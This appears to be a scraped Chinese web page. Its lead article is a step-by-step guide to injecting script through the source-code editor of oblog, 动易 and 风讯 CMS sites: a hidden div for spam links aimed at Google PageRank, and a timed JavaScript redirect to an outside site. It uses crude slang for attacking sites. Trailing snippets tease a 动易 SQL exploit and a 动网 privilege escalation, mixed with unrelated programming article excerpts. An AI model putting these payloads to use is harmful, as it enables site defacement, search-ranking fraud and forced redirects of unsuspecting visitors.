关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析_漏洞研究

目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。 

具体操作是: 

1,进入"源码"编辑 

2,输入阶段公分四段: 

第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容> 

第二段:<script>document.write('<div style="display:none">');</script> 

第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会被搜索引擎发现> 

第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location='http://31u.net';}</SCRIPT> 

第一段你可以略过,如果你想剧烈的强奸的话。第二段代码是为了隐藏第三段的链接。第四段为定时和跳转。将时间设定超过10秒为好,呵呵有利于搜索引擎收录嘛。 

也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。 

3,提交。 

此方法目前没有解决ubb转换的问题。但是作者目前发现好多的文章系统什么的都没有进行ubb转换,动网论坛目前暂时无法强奸,正在进一步研究中 

时间: 2024-11-08 22:11:59

关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析_漏洞研究的相关文章

动易SQL版新洞利用短信功能直接拿后台_漏洞研究

先注册个号,进入控制面版给自己发条短信   http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4   这就是点```   用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为   =没有登陆````ef0020cf8c5e45b9 密码是这个```   下面就开始将管理员的密码更新为我注册用户的密码````   利用动易爆库改库程序先将pe_admin里ad

Alluxio源码分析:RPC框架浅析(三)

        Alluxio源码分析是一个基于内存的分布式文件系统,和HDFS.HBase等一样,也是由主从节点构成的.而节点之间的通信,一般都是采用的RPC通讯模型.Alluxio中RPC是基于何种技术如何实现的呢?它对于RPC请求是如何处理的?都涉及到哪些组件?本文将针对这些问题,为您一一解答.         继<Alluxio源码分析:RPC框架浅析(二)>一文后,本文继续讲解Alluxio中RPC实现.         4.Client端实现        以FileSystemM

Alluxio源码分析:RPC框架浅析(二)

        Alluxio源码分析是一个基于内存的分布式文件系统,和HDFS.HBase等一样,也是由主从节点构成的.而节点之间的通信,一般都是采用的RPC通讯模型.Alluxio中RPC是基于何种技术如何实现的呢?它对于RPC请求是如何处理的?都涉及到哪些组件?本文将针对这些问题,为您一一解答.         继<Alluxio源码分析:RPC框架浅析(一)>一文后,本文继续讲解Alluxio中RPC实现.         3.Server端实现:RPC Server端口绑定.传输协议

java源码-竞赛小程序,我不太会写,求大神教我

问题描述 竞赛小程序,我不太会写,求大神教我 这个题目不太会写,求大神教思路给源码?????????????????????????? 解决方案 http://blog.csdn.net/ocean20/article/details/5017538 解决方案二: 解决问题分步走: 1.判断是否为方阵,判断每行相邻数据是否有相等的,有即非方阵,判断行数据相等应该会不需提供代码: 2.判断是否标准反正,判断第一行相邻数据是否差值等于1,判断第一列相邻数据差值是否等于1,应该会不需提供代码.

Alluxio源码分析:RPC框架浅析(一)

        Alluxio源码分析是一个基于内存的分布式文件系统,和HDFS.HBase等一样,也是由主从节点构成的.而节点之间的通信,一般都是采用的RPC通讯模型.Alluxio中RPC是基于何种技术如何实现的呢?它对于RPC请求是如何处理的?都涉及到哪些组件?本文将针对这些问题,为您一一解答.         一.Alluxio中RPC实现技术支持         Alluxio中的RPC是依靠Thrift实现的,Apache Thrift 是 Facebook 实现的一种高效的.支持多

如何修改spark源码,更改程序名称。

问题描述 想修改spark源码,想把程序的名称改为其他的,而不是spark,这个怎么修改呢?源码中有用到APPLICATION_NAMEpublicstaticfinalStringAPPLICATION_NAME="APPLICATION_NAME";在default.java中,这个APPLICATION_NAME,程序是如何自动获取"spark"这个名称的,想修改又如何修改.大神们帮帮忙啊

解析xHTML源码的DLL组件AngleSharp介绍_实用技巧

AngleSharp是基于.NET(C#)开发的专门为解析xHTML源码的DLL组件. 项目地址:https://github.com/FlorianRappl/AngleSharp 国内:Jumony github地址: https://github.com/Ivony/Jumony 国外:Html Agility Pack 项目地址:http://htmlagilitypack.codeplex.com/ 具体大家可以自行搜索对比三者的区别和性能.接下来咱们主要讨论主角是AngleSharp

微信 小程序前端源码详解及实例分析_其它综合

微信小程序前端源码逻辑和工作流 看完微信小程序的前端代码真的让我热血沸腾啊,代码逻辑和设计一目了然,没有多余的东西,真的是大道至简. 废话不多说,直接分析前端代码.个人观点,难免有疏漏,仅供参考. 文件基本结构: 先看入口app.js,app(obj)注册一个小程序.接受一个 object 参数,其指定小程序的生命周期函数等.其他文件可以通过全局方法getApp()获取app实例,进而直接调用它的属性或方法,例如(getApp().globalData) //app.js App({ onLau

动网7.x权限提升漏洞原理_漏洞研究

在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文说是admin_postings.asp文件存在注入漏洞但利用的前提是拥有超级版主或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞 正好可以结合起来利用.这个前台权限提升漏洞对7.x的ccess和 SQL版都有效.下面我们就以7.0 SP2 SQL版讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢让我们看看登录验证